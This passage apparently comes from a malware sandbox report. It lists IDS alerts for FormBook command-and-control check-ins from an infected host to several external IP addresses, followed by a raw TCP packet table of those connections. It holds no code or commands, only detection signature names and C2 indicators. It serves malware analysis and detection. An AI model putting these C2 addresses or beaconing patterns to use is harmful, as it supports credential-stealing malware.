2024-11-15T04:21:34.416407+0100	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.2.4	49737	154.92.61.37	80	TCP
2024-11-15T04:21:51.135711+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.4	49740	3.33.130.190	80	TCP
2024-11-15T04:21:52.844924+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.4	49756	3.33.130.190	80	TCP
2024-11-15T04:21:55.337611+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.4	49771	3.33.130.190	80	TCP
2024-11-15T04:21:58.968332+0100	2050745	ET MALWARE FormBook CnC Checkin (GET) M5	1	192.168.2.4	49786	3.33.130.190	80	TCP
2024-11-15T04:21:58.968332+0100	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.2.4	49786	3.33.130.190	80	TCP
2024-11-15T04:22:05.151758+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.4	49801	203.161.49.193	80	TCP
2024-11-15T04:22:07.685048+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.4	49802	203.161.49.193	80	TCP
2024-11-15T04:22:10.251146+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.4	49803	203.161.49.193	80	TCP
2024-11-15T04:22:12.806045+0100	2050745	ET MALWARE FormBook CnC Checkin (GET) M5	1	192.168.2.4	49804	203.161.49.193	80	TCP
2024-11-15T04:22:12.806045+0100	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.2.4	49804	203.161.49.193	80	TCP
2024-11-15T04:22:19.370197+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.4	49805	3.33.130.190	80	TCP
2024-11-15T04:22:21.083686+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.4	49806	3.33.130.190	80	TCP
2024-11-15T04:22:23.605330+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.4	49807	3.33.130.190	80	TCP
2024-11-15T04:22:26.196613+0100	2050745	ET MALWARE FormBook CnC Checkin (GET) M5	1	192.168.2.4	49808	3.33.130.190	80	TCP
2024-11-15T04:22:26.196613+0100	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.2.4	49808	3.33.130.190	80	TCP
2024-11-15T04:22:31.871884+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.4	49809	3.33.130.190	80	TCP
2024-11-15T04:22:34.430043+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.4	49810	3.33.130.190	80	TCP
2024-11-15T04:22:37.854441+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.4	49811	3.33.130.190	80	TCP
2024-11-15T04:22:39.516299+0100	2050745	ET MALWARE FormBook CnC Checkin (GET) M5	1	192.168.2.4	49812	3.33.130.190	80	TCP
2024-11-15T04:22:39.516299+0100	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.2.4	49812	3.33.130.190	80	TCP
2024-11-15T04:22:45.277385+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.4	49813	198.252.98.54	80	TCP
2024-11-15T04:22:47.821448+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.4	49814	198.252.98.54	80	TCP
2024-11-15T04:22:50.375180+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.4	49815	198.252.98.54	80	TCP
2024-11-15T04:22:52.955773+0100	2050745	ET MALWARE FormBook CnC Checkin (GET) M5	1	192.168.2.4	49816	198.252.98.54	80	TCP
2024-11-15T04:22:52.955773+0100	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.2.4	49816	198.252.98.54	80	TCP
2024-11-15T04:22:59.125560+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.4	49817	103.224.182.242	80	TCP
2024-11-15T04:23:01.685107+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.4	49818	103.224.182.242	80	TCP
2024-11-15T04:23:04.251133+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.4	49819	103.224.182.242	80	TCP
2024-11-15T04:23:06.737546+0100	2050745	ET MALWARE FormBook CnC Checkin (GET) M5	1	192.168.2.4	49820	103.224.182.242	80	TCP
2024-11-15T04:23:06.737546+0100	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.2.4	49820	103.224.182.242	80	TCP
2024-11-15T04:23:13.667321+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.4	49821	154.23.184.218	80	TCP
2024-11-15T04:23:16.010987+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.4	49822	154.23.184.218	80	TCP
2024-11-15T04:23:18.764585+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.4	49823	154.23.184.218	80	TCP
2024-11-15T04:23:21.108004+0100	2050745	ET MALWARE FormBook CnC Checkin (GET) M5	1	192.168.2.4	49824	154.23.184.218	80	TCP
2024-11-15T04:23:21.108004+0100	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.2.4	49824	154.23.184.218	80	TCP
2024-11-15T04:23:27.511145+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.4	49825	31.31.196.17	80	TCP
2024-11-15T04:23:30.089396+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.4	49826	31.31.196.17	80	TCP
2024-11-15T04:23:32.620667+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.4	49827	31.31.196.17	80	TCP
2024-11-15T04:23:35.151896+0100	2050745	ET MALWARE FormBook CnC Checkin (GET) M5	1	192.168.2.4	49828	31.31.196.17	80	TCP
2024-11-15T04:23:35.151896+0100	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.2.4	49828	31.31.196.17	80	TCP
2024-11-15T04:23:41.464492+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.4	49829	64.190.63.222	80	TCP
2024-11-15T04:23:44.058193+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.4	49830	64.190.63.222	80	TCP
2024-11-15T04:23:46.589486+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.4	49831	64.190.63.222	80	TCP
2024-11-15T04:23:49.105327+0100	2050745	ET MALWARE FormBook CnC Checkin (GET) M5	1	192.168.2.4	49832	64.190.63.222	80	TCP
2024-11-15T04:23:49.105327+0100	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.2.4	49832	64.190.63.222	80	TCP
2024-11-15T04:23:55.295875+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.4	49833	217.76.156.252	80	TCP
2024-11-15T04:23:58.398718+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.4	49834	217.76.156.252	80	TCP
2024-11-15T04:24:01.491710+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.4	49835	217.76.156.252	80	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 15, 2024 04:21:33.376991034 CET	49737	80	192.168.2.4	154.92.61.37
Nov 15, 2024 04:21:33.382456064 CET	80	49737	154.92.61.37	192.168.2.4
Nov 15, 2024 04:21:33.383541107 CET	49737	80	192.168.2.4	154.92.61.37
Nov 15, 2024 04:21:33.390450001 CET	49737	80	192.168.2.4	154.92.61.37
Nov 15, 2024 04:21:33.395659924 CET	80	49737	154.92.61.37	192.168.2.4
Nov 15, 2024 04:21:34.367914915 CET	80	49737	154.92.61.37	192.168.2.4
Nov 15, 2024 04:21:34.416407108 CET	49737	80	192.168.2.4	154.92.61.37
Nov 15, 2024 04:21:34.547780991 CET	80	49737	154.92.61.37	192.168.2.4
Nov 15, 2024 04:21:34.547996044 CET	49737	80	192.168.2.4	154.92.61.37
Nov 15, 2024 04:21:34.549138069 CET	49737	80	192.168.2.4	154.92.61.37
Nov 15, 2024 04:21:34.554126024 CET	80	49737	154.92.61.37	192.168.2.4
Nov 15, 2024 04:21:49.611581087 CET	49740	80	192.168.2.4	3.33.130.190
Nov 15, 2024 04:21:49.616499901 CET	80	49740	3.33.130.190	192.168.2.4
Nov 15, 2024 04:21:49.616638899 CET	49740	80	192.168.2.4	3.33.130.190
Nov 15, 2024 04:21:49.631073952 CET	49740	80	192.168.2.4	3.33.130.190
Nov 15, 2024 04:21:49.636265039 CET	80	49740	3.33.130.190	192.168.2.4
Nov 15, 2024 04:21:51.135710955 CET	49740	80	192.168.2.4	3.33.130.190
Nov 15, 2024 04:21:51.141429901 CET	80	49740	3.33.130.190	192.168.2.4
Nov 15, 2024 04:21:51.141504049 CET	49740	80	192.168.2.4	3.33.130.190
Nov 15, 2024 04:21:52.155478001 CET	49756	80	192.168.2.4	3.33.130.190
Nov 15, 2024 04:21:52.160454035 CET	80	49756	3.33.130.190	192.168.2.4
Nov 15, 2024 04:21:52.160881996 CET	49756	80	192.168.2.4	3.33.130.190
Nov 15, 2024 04:21:52.175410986 CET	49756	80	192.168.2.4	3.33.130.190
Nov 15, 2024 04:21:52.180984974 CET	80	49756	3.33.130.190	192.168.2.4
Nov 15, 2024 04:21:52.844610929 CET	80	49756	3.33.130.190	192.168.2.4
Nov 15, 2024 04:21:52.844923973 CET	49756	80	192.168.2.4	3.33.130.190
Nov 15, 2024 04:21:53.682575941 CET	49756	80	192.168.2.4	3.33.130.190
Nov 15, 2024 04:21:53.688052893 CET	80	49756	3.33.130.190	192.168.2.4
Nov 15, 2024 04:21:54.701807976 CET	49771	80	192.168.2.4	3.33.130.190
Nov 15, 2024 04:21:54.706741095 CET	80	49771	3.33.130.190	192.168.2.4
Nov 15, 2024 04:21:54.709939003 CET	49771	80	192.168.2.4	3.33.130.190
Nov 15, 2024 04:21:54.723742008 CET	49771	80	192.168.2.4	3.33.130.190
Nov 15, 2024 04:21:54.729042053 CET	80	49771	3.33.130.190	192.168.2.4
Nov 15, 2024 04:21:54.729087114 CET	80	49771	3.33.130.190	192.168.2.4
Nov 15, 2024 04:21:54.729116917 CET	80	49771	3.33.130.190	192.168.2.4
Nov 15, 2024 04:21:54.729145050 CET	80	49771	3.33.130.190	192.168.2.4
Nov 15, 2024 04:21:54.729172945 CET	80	49771	3.33.130.190	192.168.2.4
Nov 15, 2024 04:21:54.729216099 CET	80	49771	3.33.130.190	192.168.2.4
Nov 15, 2024 04:21:54.729243994 CET	80	49771	3.33.130.190	192.168.2.4
Nov 15, 2024 04:21:54.729270935 CET	80	49771	3.33.130.190	192.168.2.4
Nov 15, 2024 04:21:54.729298115 CET	80	49771	3.33.130.190	192.168.2.4
Nov 15, 2024 04:21:55.337476969 CET	80	49771	3.33.130.190	192.168.2.4
Nov 15, 2024 04:21:55.337610960 CET	49771	80	192.168.2.4	3.33.130.190
Nov 15, 2024 04:21:56.229085922 CET	49771	80	192.168.2.4	3.33.130.190
Nov 15, 2024 04:21:56.235882998 CET	80	49771	3.33.130.190	192.168.2.4
Nov 15, 2024 04:21:57.248881102 CET	49786	80	192.168.2.4	3.33.130.190
Nov 15, 2024 04:21:57.254419088 CET	80	49786	3.33.130.190	192.168.2.4
Nov 15, 2024 04:21:57.254512072 CET	49786	80	192.168.2.4	3.33.130.190
Nov 15, 2024 04:21:57.262408972 CET	49786	80	192.168.2.4	3.33.130.190
Nov 15, 2024 04:21:57.267648935 CET	80	49786	3.33.130.190	192.168.2.4
Nov 15, 2024 04:21:58.935957909 CET	80	49786	3.33.130.190	192.168.2.4
Nov 15, 2024 04:21:58.968235016 CET	80	49786	3.33.130.190	192.168.2.4
Nov 15, 2024 04:21:58.968332052 CET	49786	80	192.168.2.4	3.33.130.190
Nov 15, 2024 04:21:58.969047070 CET	49786	80	192.168.2.4	3.33.130.190
Nov 15, 2024 04:21:58.974345922 CET	80	49786	3.33.130.190	192.168.2.4
Nov 15, 2024 04:22:04.430435896 CET	49801	80	192.168.2.4	203.161.49.193
Nov 15, 2024 04:22:04.435561895 CET	80	49801	203.161.49.193	192.168.2.4
Nov 15, 2024 04:22:04.435669899 CET	49801	80	192.168.2.4	203.161.49.193
Nov 15, 2024 04:22:04.444076061 CET	49801	80	192.168.2.4	203.161.49.193
Nov 15, 2024 04:22:04.449259996 CET	80	49801	203.161.49.193	192.168.2.4
Nov 15, 2024 04:22:05.113562107 CET	80	49801	203.161.49.193	192.168.2.4
Nov 15, 2024 04:22:05.151667118 CET	80	49801	203.161.49.193	192.168.2.4
Nov 15, 2024 04:22:05.151757956 CET	49801	80	192.168.2.4	203.161.49.193
Nov 15, 2024 04:22:05.947957039 CET	49801	80	192.168.2.4	203.161.49.193
Nov 15, 2024 04:22:06.968008995 CET	49802	80	192.168.2.4	203.161.49.193
Nov 15, 2024 04:22:06.973345995 CET	80	49802	203.161.49.193	192.168.2.4
Nov 15, 2024 04:22:06.973496914 CET	49802	80	192.168.2.4	203.161.49.193
Nov 15, 2024 04:22:06.987802029 CET	49802	80	192.168.2.4	203.161.49.193
Nov 15, 2024 04:22:06.992889881 CET	80	49802	203.161.49.193	192.168.2.4
Nov 15, 2024 04:22:07.646389008 CET	80	49802	203.161.49.193	192.168.2.4
Nov 15, 2024 04:22:07.684614897 CET	80	49802	203.161.49.193	192.168.2.4
Nov 15, 2024 04:22:07.685048103 CET	49802	80	192.168.2.4	203.161.49.193
Nov 15, 2024 04:22:08.494847059 CET	49802	80	192.168.2.4	203.161.49.193
Nov 15, 2024 04:22:09.512840986 CET	49803	80	192.168.2.4	203.161.49.193
Nov 15, 2024 04:22:09.518377066 CET	80	49803	203.161.49.193	192.168.2.4
Nov 15, 2024 04:22:09.518485069 CET	49803	80	192.168.2.4	203.161.49.193
Nov 15, 2024 04:22:09.527503014 CET	49803	80	192.168.2.4	203.161.49.193
Nov 15, 2024 04:22:09.532634020 CET	80	49803	203.161.49.193	192.168.2.4
Nov 15, 2024 04:22:09.532665968 CET	80	49803	203.161.49.193	192.168.2.4
Nov 15, 2024 04:22:09.532695055 CET	80	49803	203.161.49.193	192.168.2.4
Nov 15, 2024 04:22:09.532721996 CET	80	49803	203.161.49.193	192.168.2.4
Nov 15, 2024 04:22:09.532749891 CET	80	49803	203.161.49.193	192.168.2.4
Nov 15, 2024 04:22:09.532809019 CET	80	49803	203.161.49.193	192.168.2.4
Nov 15, 2024 04:22:09.532836914 CET	80	49803	203.161.49.193	192.168.2.4
Nov 15, 2024 04:22:09.532867908 CET	80	49803	203.161.49.193	192.168.2.4
Nov 15, 2024 04:22:09.532895088 CET	80	49803	203.161.49.193	192.168.2.4
Nov 15, 2024 04:22:10.212743998 CET	80	49803	203.161.49.193	192.168.2.4
Nov 15, 2024 04:22:10.250958920 CET	80	49803	203.161.49.193	192.168.2.4
Nov 15, 2024 04:22:10.251146078 CET	49803	80	192.168.2.4	203.161.49.193
Nov 15, 2024 04:22:11.042015076 CET	49803	80	192.168.2.4	203.161.49.193
Nov 15, 2024 04:22:12.059870005 CET	49804	80	192.168.2.4	203.161.49.193
Nov 15, 2024 04:22:12.065685987 CET	80	49804	203.161.49.193	192.168.2.4
Nov 15, 2024 04:22:12.065820932 CET	49804	80	192.168.2.4	203.161.49.193
Nov 15, 2024 04:22:12.071434975 CET	49804	80	192.168.2.4	203.161.49.193
Nov 15, 2024 04:22:12.076575041 CET	80	49804	203.161.49.193	192.168.2.4
Nov 15, 2024 04:22:12.767292976 CET	80	49804	203.161.49.193	192.168.2.4
Nov 15, 2024 04:22:12.805917025 CET	80	49804	203.161.49.193	192.168.2.4
Nov 15, 2024 04:22:12.806045055 CET	49804	80	192.168.2.4	203.161.49.193
Nov 15, 2024 04:22:12.806972027 CET	49804	80	192.168.2.4	203.161.49.193
Nov 15, 2024 04:22:12.812105894 CET	80	49804	203.161.49.193	192.168.2.4
Nov 15, 2024 04:22:17.851799011 CET	49805	80	192.168.2.4	3.33.130.190
Nov 15, 2024 04:22:17.856801987 CET	80	49805	3.33.130.190	192.168.2.4
Nov 15, 2024 04:22:17.856951952 CET	49805	80	192.168.2.4	3.33.130.190
Nov 15, 2024 04:22:17.865537882 CET	49805	80	192.168.2.4	3.33.130.190
Nov 15, 2024 04:22:17.870647907 CET	80	49805	3.33.130.190	192.168.2.4
Nov 15, 2024 04:22:19.370197058 CET	49805	80	192.168.2.4	3.33.130.190
Nov 15, 2024 04:22:19.376921892 CET	80	49805	3.33.130.190	192.168.2.4
Nov 15, 2024 04:22:19.377232075 CET	49805	80	192.168.2.4	3.33.130.190
Nov 15, 2024 04:22:20.388295889 CET	49806	80	192.168.2.4	3.33.130.190
Nov 15, 2024 04:22:20.393565893 CET	80	49806	3.33.130.190	192.168.2.4
Nov 15, 2024 04:22:20.393927097 CET	49806	80	192.168.2.4	3.33.130.190
Nov 15, 2024 04:22:20.404371977 CET	49806	80	192.168.2.4	3.33.130.190
Nov 15, 2024 04:22:20.409472942 CET	80	49806	3.33.130.190	192.168.2.4
Nov 15, 2024 04:22:21.083389044 CET	80	49806	3.33.130.190	192.168.2.4
Nov 15, 2024 04:22:21.083686113 CET	49806	80	192.168.2.4	3.33.130.190
Nov 15, 2024 04:22:21.916975975 CET	49806	80	192.168.2.4	3.33.130.190
Nov 15, 2024 04:22:21.922030926 CET	80	49806	3.33.130.190	192.168.2.4
Nov 15, 2024 04:22:22.941557884 CET	49807	80	192.168.2.4	3.33.130.190
Nov 15, 2024 04:22:22.947088957 CET	80	49807	3.33.130.190	192.168.2.4
Nov 15, 2024 04:22:22.947354078 CET	49807	80	192.168.2.4	3.33.130.190
Nov 15, 2024 04:22:22.959628105 CET	49807	80	192.168.2.4	3.33.130.190
Nov 15, 2024 04:22:22.964927912 CET	80	49807	3.33.130.190	192.168.2.4
Nov 15, 2024 04:22:22.965014935 CET	80	49807	3.33.130.190	192.168.2.4
Nov 15, 2024 04:22:22.965042114 CET	80	49807	3.33.130.190	192.168.2.4
Nov 15, 2024 04:22:22.965069056 CET	80	49807	3.33.130.190	192.168.2.4
Nov 15, 2024 04:22:22.965095997 CET	80	49807	3.33.130.190	192.168.2.4
Nov 15, 2024 04:22:22.965145111 CET	80	49807	3.33.130.190	192.168.2.4
Nov 15, 2024 04:22:22.965172052 CET	80	49807	3.33.130.190	192.168.2.4
Nov 15, 2024 04:22:22.965197086 CET	80	49807	3.33.130.190	192.168.2.4
Nov 15, 2024 04:22:22.965223074 CET	80	49807	3.33.130.190	192.168.2.4
Nov 15, 2024 04:22:23.604765892 CET	80	49807	3.33.130.190	192.168.2.4
Nov 15, 2024 04:22:23.605329990 CET	49807	80	192.168.2.4	3.33.130.190
Nov 15, 2024 04:22:24.465500116 CET	49807	80	192.168.2.4	3.33.130.190
Nov 15, 2024 04:22:24.470829010 CET	80	49807	3.33.130.190	192.168.2.4
Nov 15, 2024 04:22:25.484311104 CET	49808	80	192.168.2.4	3.33.130.190
Nov 15, 2024 04:22:25.490271091 CET	80	49808	3.33.130.190	192.168.2.4
Nov 15, 2024 04:22:25.490649939 CET	49808	80	192.168.2.4	3.33.130.190
Nov 15, 2024 04:22:25.496463060 CET	49808	80	192.168.2.4	3.33.130.190
Nov 15, 2024 04:22:25.501697063 CET	80	49808	3.33.130.190	192.168.2.4
Nov 15, 2024 04:22:26.162233114 CET	80	49808	3.33.130.190	192.168.2.4
Nov 15, 2024 04:22:26.196454048 CET	80	49808	3.33.130.190	192.168.2.4
Nov 15, 2024 04:22:26.196613073 CET	49808	80	192.168.2.4	3.33.130.190
Nov 15, 2024 04:22:26.197873116 CET	49808	80	192.168.2.4	3.33.130.190
Nov 15, 2024 04:22:26.202771902 CET	80	49808	3.33.130.190	192.168.2.4
Nov 15, 2024 04:22:31.239207029 CET	49809	80	192.168.2.4	3.33.130.190
Nov 15, 2024 04:22:31.244529963 CET	80	49809	3.33.130.190	192.168.2.4
Nov 15, 2024 04:22:31.244626999 CET	49809	80	192.168.2.4	3.33.130.190
Nov 15, 2024 04:22:31.253324032 CET	49809	80	192.168.2.4	3.33.130.190
Nov 15, 2024 04:22:31.258282900 CET	80	49809	3.33.130.190	192.168.2.4
Nov 15, 2024 04:22:31.871691942 CET	80	49809	3.33.130.190	192.168.2.4
Nov 15, 2024 04:22:31.871884108 CET	49809	80	192.168.2.4	3.33.130.190
Nov 15, 2024 04:22:32.760847092 CET	49809	80	192.168.2.4	3.33.130.190
Nov 15, 2024 04:22:32.766036987 CET	80	49809	3.33.130.190	192.168.2.4
Nov 15, 2024 04:22:33.779705048 CET	49810	80	192.168.2.4	3.33.130.190
Nov 15, 2024 04:22:33.785188913 CET	80	49810	3.33.130.190	192.168.2.4
Nov 15, 2024 04:22:33.785414934 CET	49810	80	192.168.2.4	3.33.130.190
Nov 15, 2024 04:22:33.795819998 CET	49810	80	192.168.2.4	3.33.130.190
Nov 15, 2024 04:22:33.800818920 CET	80	49810	3.33.130.190	192.168.2.4
Nov 15, 2024 04:22:34.429784060 CET	80	49810	3.33.130.190	192.168.2.4
Nov 15, 2024 04:22:34.430042982 CET	49810	80	192.168.2.4	3.33.130.190
Nov 15, 2024 04:22:35.308794022 CET	49810	80	192.168.2.4	3.33.130.190
Nov 15, 2024 04:22:35.314063072 CET	80	49810	3.33.130.190	192.168.2.4
Nov 15, 2024 04:22:36.326231956 CET	49811	80	192.168.2.4	3.33.130.190
Nov 15, 2024 04:22:36.331310987 CET	80	49811	3.33.130.190	192.168.2.4
Nov 15, 2024 04:22:36.331407070 CET	49811	80	192.168.2.4	3.33.130.190
Nov 15, 2024 04:22:36.342225075 CET	49811	80	192.168.2.4	3.33.130.190
Nov 15, 2024 04:22:36.347227097 CET	80	49811	3.33.130.190	192.168.2.4
Nov 15, 2024 04:22:36.347242117 CET	80	49811	3.33.130.190	192.168.2.4
Nov 15, 2024 04:22:36.347253084 CET	80	49811	3.33.130.190	192.168.2.4
Nov 15, 2024 04:22:36.347265959 CET	80	49811	3.33.130.190	192.168.2.4
Nov 15, 2024 04:22:36.347276926 CET	80	49811	3.33.130.190	192.168.2.4
Nov 15, 2024 04:22:36.347474098 CET	80	49811	3.33.130.190	192.168.2.4
Nov 15, 2024 04:22:36.347486019 CET	80	49811	3.33.130.190	192.168.2.4
Nov 15, 2024 04:22:36.347507954 CET	80	49811	3.33.130.190	192.168.2.4
Nov 15, 2024 04:22:36.347520113 CET	80	49811	3.33.130.190	192.168.2.4
Nov 15, 2024 04:22:37.854440928 CET	49811	80	192.168.2.4	3.33.130.190
Nov 15, 2024 04:22:37.903537989 CET	80	49811	3.33.130.190	192.168.2.4
Nov 15, 2024 04:22:38.883670092 CET	49812	80	192.168.2.4	3.33.130.190
Nov 15, 2024 04:22:38.889126062 CET	80	49812	3.33.130.190	192.168.2.4
Nov 15, 2024 04:22:38.889317036 CET	49812	80	192.168.2.4	3.33.130.190
Nov 15, 2024 04:22:38.895126104 CET	49812	80	192.168.2.4	3.33.130.190
Nov 15, 2024 04:22:38.900254011 CET	80	49812	3.33.130.190	192.168.2.4
Nov 15, 2024 04:22:39.516020060 CET	80	49812	3.33.130.190	192.168.2.4
Nov 15, 2024 04:22:39.516100883 CET	80	49812	3.33.130.190	192.168.2.4
Nov 15, 2024 04:22:39.516299009 CET	49812	80	192.168.2.4	3.33.130.190
Nov 15, 2024 04:22:39.518692970 CET	49812	80	192.168.2.4	3.33.130.190
Nov 15, 2024 04:22:39.523787975 CET	80	49812	3.33.130.190	192.168.2.4
Nov 15, 2024 04:22:44.570420027 CET	49813	80	192.168.2.4	198.252.98.54
Nov 15, 2024 04:22:44.575558901 CET	80	49813	198.252.98.54	192.168.2.4
Nov 15, 2024 04:22:44.575762987 CET	49813	80	192.168.2.4	198.252.98.54
Nov 15, 2024 04:22:44.592957973 CET	49813	80	192.168.2.4	198.252.98.54
Nov 15, 2024 04:22:44.598383904 CET	80	49813	198.252.98.54	192.168.2.4
Nov 15, 2024 04:22:44.826600075 CET	80	49811	3.33.130.190	192.168.2.4
Nov 15, 2024 04:22:44.826761007 CET	49811	80	192.168.2.4	3.33.130.190
Nov 15, 2024 04:22:45.240910053 CET	80	49813	198.252.98.54	192.168.2.4
Nov 15, 2024 04:22:45.277178049 CET	80	49813	198.252.98.54	192.168.2.4
Nov 15, 2024 04:22:45.277384996 CET	49813	80	192.168.2.4	198.252.98.54
Nov 15, 2024 04:22:46.104579926 CET	49813	80	192.168.2.4	198.252.98.54
Nov 15, 2024 04:22:47.125452995 CET	49814	80	192.168.2.4	198.252.98.54
Nov 15, 2024 04:22:47.131050110 CET	80	49814	198.252.98.54	192.168.2.4
Nov 15, 2024 04:22:47.131552935 CET	49814	80	192.168.2.4	198.252.98.54
Nov 15, 2024 04:22:47.149352074 CET	49814	80	192.168.2.4	198.252.98.54
Nov 15, 2024 04:22:47.154798985 CET	80	49814	198.252.98.54	192.168.2.4
Nov 15, 2024 04:22:47.788678885 CET	80	49814	198.252.98.54	192.168.2.4
Nov 15, 2024 04:22:47.821333885 CET	80	49814	198.252.98.54	192.168.2.4
Nov 15, 2024 04:22:47.821448088 CET	49814	80	192.168.2.4	198.252.98.54
Nov 15, 2024 04:22:48.652168989 CET	49814	80	192.168.2.4	198.252.98.54
Nov 15, 2024 04:22:49.671262980 CET	49815	80	192.168.2.4	198.252.98.54
Nov 15, 2024 04:22:49.717483997 CET	80	49815	198.252.98.54	192.168.2.4
Nov 15, 2024 04:22:49.717633963 CET	49815	80	192.168.2.4	198.252.98.54
Nov 15, 2024 04:22:49.732640028 CET	49815	80	192.168.2.4	198.252.98.54
Nov 15, 2024 04:22:49.737766027 CET	80	49815	198.252.98.54	192.168.2.4
Nov 15, 2024 04:22:49.737785101 CET	80	49815	198.252.98.54	192.168.2.4
Nov 15, 2024 04:22:49.737796068 CET	80	49815	198.252.98.54	192.168.2.4
Nov 15, 2024 04:22:49.737809896 CET	80	49815	198.252.98.54	192.168.2.4
Nov 15, 2024 04:22:49.737821102 CET	80	49815	198.252.98.54	192.168.2.4
Nov 15, 2024 04:22:49.738168001 CET	80	49815	198.252.98.54	192.168.2.4
Nov 15, 2024 04:22:49.738179922 CET	80	49815	198.252.98.54	192.168.2.4
Nov 15, 2024 04:22:49.738190889 CET	80	49815	198.252.98.54	192.168.2.4
Nov 15, 2024 04:22:49.738202095 CET	80	49815	198.252.98.54	192.168.2.4
Nov 15, 2024 04:22:50.374857903 CET	80	49815	198.252.98.54	192.168.2.4
Nov 15, 2024 04:22:50.374906063 CET	80	49815	198.252.98.54	192.168.2.4
Nov 15, 2024 04:22:50.375180006 CET	49815	80	192.168.2.4	198.252.98.54
Nov 15, 2024 04:22:51.246020079 CET	49815	80	192.168.2.4	198.252.98.54
Nov 15, 2024 04:22:52.264992952 CET	49816	80	192.168.2.4	198.252.98.54
Nov 15, 2024 04:22:52.270529032 CET	80	49816	198.252.98.54	192.168.2.4
Nov 15, 2024 04:22:52.270737886 CET	49816	80	192.168.2.4	198.252.98.54
Nov 15, 2024 04:22:52.285370111 CET	49816	80	192.168.2.4	198.252.98.54
Nov 15, 2024 04:22:52.290572882 CET	80	49816	198.252.98.54	192.168.2.4
Nov 15, 2024 04:22:52.922998905 CET	80	49816	198.252.98.54	192.168.2.4
Nov 15, 2024 04:22:52.955564976 CET	80	49816	198.252.98.54	192.168.2.4
Nov 15, 2024 04:22:52.955773115 CET	49816	80	192.168.2.4	198.252.98.54
Nov 15, 2024 04:22:52.957514048 CET	49816	80	192.168.2.4	198.252.98.54
Nov 15, 2024 04:22:52.962549925 CET	80	49816	198.252.98.54	192.168.2.4
Nov 15, 2024 04:22:58.406997919 CET	49817	80	192.168.2.4	103.224.182.242
Nov 15, 2024 04:22:58.413770914 CET	80	49817	103.224.182.242	192.168.2.4
Nov 15, 2024 04:22:58.413985968 CET	49817	80	192.168.2.4	103.224.182.242
Nov 15, 2024 04:22:58.428462029 CET	49817	80	192.168.2.4	103.224.182.242
Nov 15, 2024 04:22:58.433986902 CET	80	49817	103.224.182.242	192.168.2.4
Nov 15, 2024 04:22:59.095360994 CET	80	49817	103.224.182.242	192.168.2.4
Nov 15, 2024 04:22:59.125386000 CET	80	49817	103.224.182.242	192.168.2.4
Nov 15, 2024 04:22:59.125560045 CET	49817	80	192.168.2.4	103.224.182.242
Nov 15, 2024 04:22:59.933295012 CET	49817	80	192.168.2.4	103.224.182.242
Nov 15, 2024 04:23:00.960295916 CET	49818	80	192.168.2.4	103.224.182.242
Nov 15, 2024 04:23:00.965516090 CET	80	49818	103.224.182.242	192.168.2.4
Nov 15, 2024 04:23:00.965624094 CET	49818	80	192.168.2.4	103.224.182.242
Nov 15, 2024 04:23:00.986793041 CET	49818	80	192.168.2.4	103.224.182.242
Nov 15, 2024 04:23:00.991789103 CET	80	49818	103.224.182.242	192.168.2.4
Nov 15, 2024 04:23:01.654093981 CET	80	49818	103.224.182.242	192.168.2.4
Nov 15, 2024 04:23:01.684762001 CET	80	49818	103.224.182.242	192.168.2.4
Nov 15, 2024 04:23:01.685106993 CET	49818	80	192.168.2.4	103.224.182.242
Nov 15, 2024 04:23:02.498051882 CET	49818	80	192.168.2.4	103.224.182.242
Nov 15, 2024 04:23:03.515259981 CET	49819	80	192.168.2.4	103.224.182.242
